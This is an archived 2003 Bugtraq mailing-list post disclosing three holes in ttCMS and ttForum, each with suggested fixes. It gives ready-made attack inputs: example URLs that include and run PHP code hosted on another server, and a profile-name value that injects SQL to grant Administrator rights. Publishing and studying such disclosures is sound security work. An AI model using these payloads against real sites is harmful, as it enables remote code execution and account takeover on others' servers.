| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20030509165836.18096.qmail@www.securityfocus.com>
Date: 9 May 2003 16:58:36 -0000
From: Charles Reinold <creinold@...mail.com>
To: bugtraq@...urityfocus.com
Subject: ttcms and ttforum exploits
hope this is the right place to send this exploit info, I found three
diffrent exploits for a forum software / cms software:
--------------------------------------------------------------------------
----------------------------------------------------------------------
Affected Product: ttCMS or ttForum
Affected Versions: ttCMS 2.2, (possibly more) all versions of ttForum.
Description of exploit:
Open up modules/forum/News.php (ttCMS) or News.php (ttForum).
As you can see, this line:
include($template . '.' . $ext);
Includes a file directly from the user input.
Here's an example exploit URL:
http://www.yourserver.com/ttforum/index.php?
action=news;board=1;template=http://www.yourserver.com/modules/forum/helpa
dmin;ext=help
As you can see, it's possible to execute remote code using this hole.
Possible solutions:
Install YaBB SE 1.5.2. While ttForum is a derivative of YaBB SE, this
hole does not exist there.
Upgrade to a newer version of ttForum/ttCMS that fixes the hole. (none
is yet available.)
Use a different forum and/or CMS software.
--------------------------------------------------------------------------
----------------------------------------------------------------------
Affected Product: ttCMS or ttForum
Affected Versions: ttCMS 2.2, (possibly more) all versions of ttForum.
Description of exploit:
Open up modules/forum/src/Profile.php (ttCMS) or src/Profile.php
(ttForum).
As you can see, this line:
foreach ($HTTP_POST_VARS as $key => $value) {
$member[$key] = str_replace(array('&', '"', '<', '>'), array
('&', '"', '<', '>'), trim($value));
Parses out ", <, >, and &. It, however, does not parse out a SINGLE
quote.
Now scroll down.
SET $queryPasswdPart $customTitlePart realName='$member[name]',
As you can see, simply setting your name to "me'
memberGroup='Administrator" would make you an Administrator on any server
that had magic_quotes_gpc off.
As you can see from the php.ini-recommended file:
; - magic_quotes_gpc = Off [Performance]
They recommend it off, and thus a multitude of servers have it off,
enabling this hole.
Possible solutions:
Install YaBB SE 1.5.2. While ttForum is a derivative of YaBB SE, this
hole does not exist there.
Upgrade to a newer version of ttForum/ttCMS that fixes the hole. (none
is yet available.)
Use a different forum and/or CMS software.
--------------------------------------------------------------------------
----------------------------------------------------------------------
Title: ttForum / ttCMS, remote command execution.
Application: ttForum up to 1.1, ttCMS 2.2Platform(s): Unix
Technical description:
----------------------
Everybody can inject PHP code in ttForum/ttCMS through the
ttForumInstaller. The Installer (which can be found in
the /modules/forumdirectory in ttCMS) includes the Forum-Settings
throughinclude("$installdir/Settings.php") where $installdir istaken from
a Form.In order to exploit this vulnerability, all you have to do is
tocreate a File "Settings.php" on your own webserver which containsthe
code you want to execute on the target-system. If you now callthe
install.php-File with the following parameters:http://target-
system/install.php?step=7&installdir=http://yourserver/the code in
Settings.php will be injected.
Recommendations:
----------------
Delete install.php AS SOON AS POSSIBLE or use YaBB SE 1.5.2 (ttForumis a
derivate of YaBB SE)
Powered by blists - more mailing lists